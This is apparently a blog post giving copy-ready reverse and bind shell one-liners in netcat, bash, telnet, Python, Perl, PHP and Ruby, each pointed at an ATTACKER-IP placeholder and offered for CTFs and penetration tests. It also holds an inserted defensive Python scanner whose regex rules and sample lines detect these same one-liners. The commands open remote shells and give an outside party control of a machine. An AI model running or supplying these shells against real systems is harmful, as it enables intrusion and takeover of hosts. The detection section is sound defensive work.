Hi, I thought I'd introduce a few one-liners for reverse and bind shells.
On Linux there are many ways to create a reverse or bind shell; I'll show you some of them. You can copy them if needed and use them for CTFs or penetration tests.
Reverse-Shells:
NC/NetCat:
strider@paff-shell.com~$ /bin/nc ATTACKER-IP ATTACKER-PORT -e /bin/sh
strider@paff-shell.com~$ /bin/nc ATTACKER-IP ATTACKER-PORT -c /bin/sh
strider@paff-shell.com~$ rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER-IP ATTACKER-PORT > /tmp/f
Bash:
strider@paff-shell.com~$ /bin/bash -i &> /dev/tcp/ATTACKER-IP/ATTACKER-PORT 0>&1
strider@paff-shell.com~$ /bin/sh -i &> /dev/udp/ATTACKER-IP/ATTACKER-PORT 0>&1
Telnet:
strider@paff-shell.com~$ telnet ATTACKER-IP ATTACKER-PORT1 | /bin/bash | telnet ATTACKER-IP ATTACKER-PORT2
strider@paff-shell.com~$ rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | telnet ATTACKER-IP ATTACKER-PORT > /tmp/f
Python:
strider@paff-shell.com~$ python -c "import os, socket, subprocess;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('ATTACKER-IP', ATTACKER-PORT));os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);p = subprocess.Popen(['/bin/bash', '-i']);"
Perl:
strider@paff-shell.com~$ perl -e 'use Socket;$host="ATTACKER-IP";$port=ATTACKER-PORT;socket(Sock, PF_INET, SOCK_STREAM, getprotobyname("tcp"));if(connect(Sock, sockaddr_in($port, inet_aton($host)))){open(STDIN, ">&Sock");open(STDOUT, ">&Sock");open(STDERR, ">&Sock");exec("/bin/bash -i");};'
PHP:
strider@paff-shell.com~$ php -r '$sock=fsockopen("ATTACKER-IP",ATTACKER-PORT);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
Ruby:
strider@paff-shell.com~$ ruby -rsocket -e "exit if fork;s=TCPSocket.new('ATTACKER-IP',ATTACKER-PORT);while(s.print '$';s2=s.gets);IO.popen(s2,'r'){|s3|s.print s3.read}end"
Bind-Shells:
NC/NetCat:
strider@paff-shell.com~$ /bin/nc -e /bin/sh -nlp ATTACKER-PORT
strider@paff-shell.com~$ /bin/nc -c /bin/sh -nlp ATTACKER-PORT
strider@paff-shell.com~$ /bin/nc -c /bin/sh -nlup ATTACKER-PORT
strider@paff-shell.com~$ rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -lvp ATTACKER-PORT > /tmp/f;
Python:
strider@paff-shell.com~$ python -c "import os, socket, subprocess;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.bind(('0.0.0.0', ATTACKER-PORT));s.listen(5);c, _ = s.accept();os.dup2(c.fileno(), 0);os.dup2(c.fileno(), 1);os.dup2(c.fileno(), 2);p = subprocess.Popen(['/bin/bash', '-i']);"
Perl:
strider@paff-shell.com~$ perl -e 'use Socket;$port=ATTACKER-PORT;socket(Sock, PF_INET, SOCK_STREAM, getprotobyname("tcp"));bind(Sock, sockaddr_in($port, INADDR_ANY));listen(Sock, SOMAXCONN);for(; $c = accept(C, Sock); close(Sock)){open(STDIN, ">&C");open(STDOUT, ">&C");open(STDERR, ">&C");exec("/bin/bash -i");};'
PHP:
strider@paff-shell.com~$ php -r '$sock=socket_create(AF_INET, SOCK_STREAM, SOL_TCP);socket_get_option($sock, SOL_SOCKET, SO_REUSEADDR);socket_bind($sock, "0.0.0.0", ATTACKER-PORT); socket_listen($sock); $c=socket_accept($sock);while(true){$cmd=socket_read($c, 1024);socket_write($c, shell_exec($cmd));}'
Ruby:
strider@paff-shell.com~$ ruby -rsocket -e "exit if fork;s=TCPServer.new(ATTACKER-PORT);loop do;c=s.accept();while(c.print '$';s2=c.gets);puts s2;IO.popen(s2,'r'){|s3|c.print s3.read};end;end"
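A defender-side counterpart, added here as an example and not part of the original post or its repository: a small Python scanner that turns the shapes of the one-liners above into detection rules and runs them over process command lines, the kind you get from auditd EXECVE records, an EDR, or shell history. The rule names, the sample lines, the address 10.0.0.5 and port 4444 are all constructed placeholders standing in for ATTACKER-IP and ATTACKER-PORT.

```python
"""Flag shell-spawning network one-liners in process command lines.

Added example, not code from the post above. Each rule mirrors one family of
one-liners listed there:
  - bash /dev/tcp or /dev/udp redirections            (Bash section)
  - nc/ncat/netcat run with -e, -c, --exec, --sh-exec  (NC/NetCat sections)
  - mkfifo pipelines feeding a shell into nc or telnet (mkfifo one-liners)
  - telnet piped straight into a shell                 (Telnet section)
  - python/perl/php/ruby code that both opens a socket
    and spawns a shell                                 (interpreter sections)
"""
from __future__ import annotations

import re

# A shell binary path or bare shell name anywhere on the line.
_SHELL = r"(?:/bin/(?:ba|da)?sh\b|\b(?:ba|da)?sh\b)"

_DEV_SOCKET = re.compile(r"/dev/(?:tcp|udp)/")
# nc with an exec-style option inside the same pipeline stage (stops at | ; &).
_NC_EXEC = re.compile(
    r"\b(?:nc|ncat|netcat)\b[^|;&]*?\s(?:-[ec]|--(?:sh-)?exec)(?=\s|$)")
_FIFO = re.compile(r"\bmkfifo\b")
_NET_CLIENT = re.compile(r"\b(?:nc|ncat|netcat|telnet)\b")
_SHELL_RE = re.compile(_SHELL)
_TELNET_PIPE = re.compile(r"\btelnet\b[^|]*\|\s*" + _SHELL)
_INTERP = re.compile(r"\b(?:python[23]?|perl|php|ruby)\b")
# Socket primitives used by the python/perl/php/ruby one-liners.
_SOCKET_API = re.compile(
    r"socket\s*\(|socket\.socket|TCPSocket|TCPServer|fsockopen|socket_create")
# Process-spawn primitives that hand the socket to a shell.
_SPAWN_API = re.compile(
    r"/bin/(?:ba)?sh|\b(?:shell_)?exec\s*\(|proc_open|popen|subprocess|dup2")


def classify(cmdline: str) -> list[str]:
    """Return the names of every rule the command line trips (empty if none)."""
    hits: list[str] = []
    if _DEV_SOCKET.search(cmdline):
        hits.append("bash-dev-tcp")
    if _NC_EXEC.search(cmdline):
        hits.append("netcat-exec")
    if (_FIFO.search(cmdline) and _NET_CLIENT.search(cmdline)
            and _SHELL_RE.search(cmdline)):
        hits.append("fifo-shell-pipe")
    if _TELNET_PIPE.search(cmdline):
        hits.append("telnet-shell-pipe")
    # Require socket + spawn together so plain `python -c` / `perl -e`
    # administration scripts do not alert.
    if (_INTERP.search(cmdline) and _SOCKET_API.search(cmdline)
            and _SPAWN_API.search(cmdline)):
        hits.append("interpreter-socket-shell")
    return hits


def scan(cmdlines: list[str]) -> list[tuple[int, str, list[str]]]:
    """Return (index, cmdline, rule_names) for every line that trips a rule."""
    results = []
    for idx, line in enumerate(cmdlines):
        rules = classify(line)
        if rules:
            results.append((idx, line, rules))
    return results


# Constructed sample telemetry: 10.0.0.5 / 4444 stand in for ATTACKER-IP / ATTACKER-PORT.
SAMPLE_CMDLINES = [
    "/bin/bash -i &> /dev/tcp/10.0.0.5/4444 0>&1",
    "/bin/nc 10.0.0.5 4444 -e /bin/sh",
    "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.5 4444 > /tmp/f",
    "telnet 10.0.0.5 4444 | /bin/bash | telnet 10.0.0.5 4445",
    "python -c \"import os, socket, subprocess;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);"
    "s.connect(('10.0.0.5', 4444));os.dup2(s.fileno(), 0);p = subprocess.Popen(['/bin/bash', '-i'])\"",
    "php -r '$sock=socket_create(AF_INET, SOCK_STREAM, SOL_TCP);socket_bind($sock, \"0.0.0.0\", 4444);"
    "socket_listen($sock);$c=socket_accept($sock);while(true){$cmd=socket_read($c, 1024);"
    "socket_write($c, shell_exec($cmd));}'",
    # Benign lines that share tokens with the rules above and must stay quiet.
    "nc -zv 10.0.0.5 22",
    "python3 -c \"import socket; print(socket.gethostname())\"",
    "bash -c \"tar czf /tmp/backup.tgz /etc\"",
    "ssh -i /home/admin/.ssh/id_ed25519 admin@10.0.0.5",
]

if __name__ == "__main__":
    for idx, line, rules in scan(SAMPLE_CMDLINES):
        print(f"[{idx}] {', '.join(rules)}: {line[:60]}")
```

To use it on real data, feed the command-line field of each process-creation event into classify(); the interpreter rule deliberately requires both a socket primitive and a spawn primitive in the same command, which keeps ordinary python -c or perl -e invocations out of the alert stream, and the netcat rule only fires on the exec-style options, so a plain nc -zv port check does not trip it.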
You can find all the one-liners again in a repository of mine 😄 I will update the whole thing from time to time. A small note on the side: I will not put every one-liner in this post; they are all in my repository 😄